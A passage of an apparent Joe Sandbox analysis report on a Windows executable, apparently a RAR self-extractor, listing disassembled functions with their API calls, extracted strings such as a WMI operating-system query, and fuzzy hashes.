                                                                                                                                                      • Opcode Fuzzy Hash: e282c6b5d08b03ac0288913873937255d76a7b6c77206c15e65a163b87b2e6f0
                                                                                                                                                      • Instruction Fuzzy Hash: 3481AE72608301AFD714DFA8CD89A6FBBF9EB89704F404A2DF98497250D734E949CB52
                                                                                                                                                      Function 00A461A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00A760E0,00000FA0,?,?,00A46185), ref: 00A461B3
                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A46185), ref: 00A461BE
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A46185), ref: 00A461CF
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A461E1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A461EF
                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A46185), ref: 00A46212
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00A760E0,00000007,?,?,00A46185), ref: 00A46235
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00A46185), ref: 00A46245
                                                                                                                                                      Strings
                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A461B9
                                                                                                                                                      • kernel32.dll, xrefs: 00A461CA
                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00A461DB
                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00A461E7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                                                                      • Opcode ID: 949dd86d0bbfcb8d5fcca9ac73476ab2abc00df333fc2d6b1bd0d0a25d5cfa1c
                                                                                                                                                      • Instruction ID: 2384d8fdfbf894705a3b48fdf7eb71f28c4ac3069778145ea7f12dcba8d37818
                                                                                                                                                      • Opcode Fuzzy Hash: 949dd86d0bbfcb8d5fcca9ac73476ab2abc00df333fc2d6b1bd0d0a25d5cfa1c
                                                                                                                                                      • Instruction Fuzzy Hash: 21015275A40B11FFD720DBF56C09F963A58BB85763701C911FD19D2294EBB4C8438A61
                                                                                                                                                      Function 00A537D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00A53816
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533CE
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533E0
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533F2
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53404
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53416
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53428
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5343A
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5344C
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5345E
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53470
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53482
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53494
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A534A6
                                                                                                                                                      • _free.LIBCMT ref: 00A5380B
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A5382D
                                                                                                                                                      • _free.LIBCMT ref: 00A53842
                                                                                                                                                      • _free.LIBCMT ref: 00A5384D
                                                                                                                                                      • _free.LIBCMT ref: 00A5386F
                                                                                                                                                      • _free.LIBCMT ref: 00A53882
                                                                                                                                                      • _free.LIBCMT ref: 00A53890
                                                                                                                                                      • _free.LIBCMT ref: 00A5389B
                                                                                                                                                      • _free.LIBCMT ref: 00A538D3
                                                                                                                                                      • _free.LIBCMT ref: 00A538DA
                                                                                                                                                      • _free.LIBCMT ref: 00A538F7
                                                                                                                                                      • _free.LIBCMT ref: 00A5390F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                      • Opcode ID: 6f1d545f7cba452e9899c05efc784f91e67985838c53e4412980b7da69a44498
                                                                                                                                                      • Instruction ID: 759467e523e2d09348e7b6a749d48eb94d91eb60779fa097e6736b969845d344
                                                                                                                                                      • Opcode Fuzzy Hash: 6f1d545f7cba452e9899c05efc784f91e67985838c53e4412980b7da69a44498
                                                                                                                                                      • Instruction Fuzzy Hash: 90315D335042049FEF24AB79E945B5AB3E9BF803A2F144429FC58DB651DA71EA48CB20
                                                                                                                                                      Function 00A3D912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3D919
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D97B
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D99A
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D9B6
                                                                                                                                                      • _strlen.LIBCMT ref: 00A3DA14
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,00A5D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00A3DA2D
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00A3DA54
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                                                                                                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                      • API String ID: 1185167184-1533471033
                                                                                                                                                      • Opcode ID: cb67a456faff6ffcdf1f11cd950cf3321e4fb4702d65473d18a978a27fed9970
                                                                                                                                                      • Instruction ID: 2ceb819cb31ca31e8af41bf0ea4f42011415df184b3a86b0ca904f44dab150e7
                                                                                                                                                      • Opcode Fuzzy Hash: cb67a456faff6ffcdf1f11cd950cf3321e4fb4702d65473d18a978a27fed9970
                                                                                                                                                      • Instruction Fuzzy Hash: C8514971D00218EFEB14EBA4DE86BEEBBB9EF55350F140029F505AB181DB705E85CBA1
                                                                                                                                                      Function 00A43796 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A437C4
                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000080), ref: 00A437F0
                                                                                                                                                        • Part of subcall function 00A38DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00A30E3F,?,?,?,00000046,00A31ECE,00000046,?,exe,00000046), ref: 00A38DBA
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4380C
                                                                                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A43823
                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A43837
                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A43860
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A43867
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A43870
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                      • String ID: STATIC
                                                                                                                                                      • API String ID: 3820355801-1882779555
                                                                                                                                                      • Opcode ID: 077c5bc5cd05bddf6d166e6107cf0081f44cd2b43c7291321fdcfd830a1ad307
                                                                                                                                                      • Instruction ID: f892b453c9dbe5aa9425db75ebca9ac3592043ccb00f762106244b8e693d7ada
                                                                                                                                                      • Opcode Fuzzy Hash: 077c5bc5cd05bddf6d166e6107cf0081f44cd2b43c7291321fdcfd830a1ad307
                                                                                                                                                      • Instruction Fuzzy Hash: E02146776483107FEA20EB74DC4AFEFB39CAF84710F004524FA05A60D2DB708A4686A5
                                                                                                                                                      Function 00A4FF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF25
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF31
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF3C
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF47
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF52
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF5D
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF68
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF73
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF7E
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF8C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 34b6121307358322502456196d9b3053dcbdb7a497a61fda076ee49eee1b61e3
                                                                                                                                                      • Instruction ID: f518473f6c623f8ebe4e2dc7c1d11544ca891182b1dc0ab30873fd5f48c94fd1
                                                                                                                                                      • Opcode Fuzzy Hash: 34b6121307358322502456196d9b3053dcbdb7a497a61fda076ee49eee1b61e3
                                                                                                                                                      • Instruction Fuzzy Hash: 1611747A51414CBFCF01EF54CA42CDD3BA5FF443A1B5140A5BE089F222DA71DA54DB80
                                                                                                                                                      Function 00A49AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                      • API String ID: 322700389-393685449
                                                                                                                                                      • Opcode ID: fc38187ca437f06a49d582b479e2d796d8769c4636856b72c468094b2dd567b6
                                                                                                                                                      • Instruction ID: 286e065a77cc8a5d23565c3d01a997271ceb5d5d42fae6376efae2eb791bfd00
                                                                                                                                                      • Opcode Fuzzy Hash: fc38187ca437f06a49d582b479e2d796d8769c4636856b72c468094b2dd567b6
                                                                                                                                                      • Instruction Fuzzy Hash: A5B15779C00209EFCF29DFA4DA819AFBBB5FF94310F14455AE8046B212D731DA61CB92
                                                                                                                                                      Function 00A2D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2D99A
                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A2D9BF
                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,?), ref: 00A2DA11
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00A2DA34
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,?,?), ref: 00A2DA84
                                                                                                                                                      • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00A2DC9F
                                                                                                                                                      • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00A2DCEC
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                                                                                      • String ID: rtmp
                                                                                                                                                      • API String ID: 2388273531-870060881
                                                                                                                                                      • Opcode ID: 7516a6d4c35f0237ae15708a807f997ebceeb5ed44600642b206947f012ae063
                                                                                                                                                      • Instruction ID: 124524dbcca8e6924974237ac8ef262b48503859631f0a22a11700d2ccd1160f
                                                                                                                                                      • Opcode Fuzzy Hash: 7516a6d4c35f0237ae15708a807f997ebceeb5ed44600642b206947f012ae063
                                                                                                                                                      • Instruction Fuzzy Hash: 75B14970901268DACF20DFA8ED85BDDBBB9BF15305F4444A9E409A7252DB309B89CF60
                                                                                                                                                      Function 00A31E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3__wcslen
                                                                                                                                                      • String ID: .rar$exe$rar$sfx
                                                                                                                                                      • API String ID: 3251556500-630704357
                                                                                                                                                      • Opcode ID: ef64c9f44d61b92f3c4987d86e51c0cde33327d68bc8f67e4a4f78cc236ad343
                                                                                                                                                      • Instruction ID: 6f97d61152ad010ec3be1583555b22535b3fe858dd5e90b24038cc47b5c3df52
                                                                                                                                                      • Opcode Fuzzy Hash: ef64c9f44d61b92f3c4987d86e51c0cde33327d68bc8f67e4a4f78cc236ad343
                                                                                                                                                      • Instruction Fuzzy Hash: 7D71E430A007149FCB25DFA9DA81BAEB7B4FF59B10F20052AF8819B291DB719D46C791
                                                                                                                                                      Function 00A453D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00A304AB,00A304AD,00000000,00000000,5C02E116,00000001,00000000,00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45459
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00A304AB,?,00000000,00000000,?,?,00A3038C,?,00000004,00A304AB), ref: 00A454D4
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00A454DF
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45508
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45512
                                                                                                                                                      • GetLastError.KERNEL32(80070057,5C02E116,00000001,00000000,00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45517
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A4552A
                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45540
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45553
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1353541977-0
                                                                                                                                                      • Opcode ID: 1348f825c888f4179389f1710388649352059cf50695195c71573bf747908a4a
                                                                                                                                                      • Instruction ID: 49582ea27ef8403144d9215415e42b2026cde8ab01fdfb5841f02060d6c6a5f7
                                                                                                                                                      • Opcode Fuzzy Hash: 1348f825c888f4179389f1710388649352059cf50695195c71573bf747908a4a
                                                                                                                                                      • Instruction Fuzzy Hash: A241F879E00704EBC710DFB8D945BAEB7B9FB84711F104229F405EB282D7349941CBA5
                                                                                                                                                      Function 00A30469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A30470
                                                                                                                                                        • Part of subcall function 00A30360: __EH_prolog3.LIBCMT ref: 00A30367
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00A305FA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3$ClearVariant
                                                                                                                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                      • API String ID: 4196654922-3505469590
                                                                                                                                                      • Opcode ID: 1f905f6f04f162ddb9263077d7b08a58c9684c8036a0238ec6fb49c876beaa37
                                                                                                                                                      • Instruction ID: 005d7e75baa1a88a7e95775ca1b434a4ab0080a1692f1862c16eaf9abd01cd10
                                                                                                                                                      • Opcode Fuzzy Hash: 1f905f6f04f162ddb9263077d7b08a58c9684c8036a0238ec6fb49c876beaa37
                                                                                                                                                      • Instruction Fuzzy Hash: 9C611A71A00319AFDB14DFA4CCA5EAE77B9FF88711F144558F512A7290CB70AD02CB60
                                                                                                                                                      Function 00A3E07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_wcslen
                                                                                                                                                      • String ID: $</p>$</style>$<br>$<style>
                                                                                                                                                      • API String ID: 3746244732-3393513139
                                                                                                                                                      • Opcode ID: 134d379d8ad9c2071920598d64e5d41435fff774d9d8ca769b7cd9d7fbf4109f
                                                                                                                                                      • Instruction ID: 077afbfaeee5654aeddddc4d4ca43f6a8eee22b7803b32ff86a2128d56a0ed7a
                                                                                                                                                      • Opcode Fuzzy Hash: 134d379d8ad9c2071920598d64e5d41435fff774d9d8ca769b7cd9d7fbf4109f
                                                                                                                                                      • Instruction Fuzzy Hash: 2851F135B40313A6DF34DB6588627BBA3B6AF74781F580119FD81AB2C0EB759D81C3A0
                                                                                                                                                      Function 00A406D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
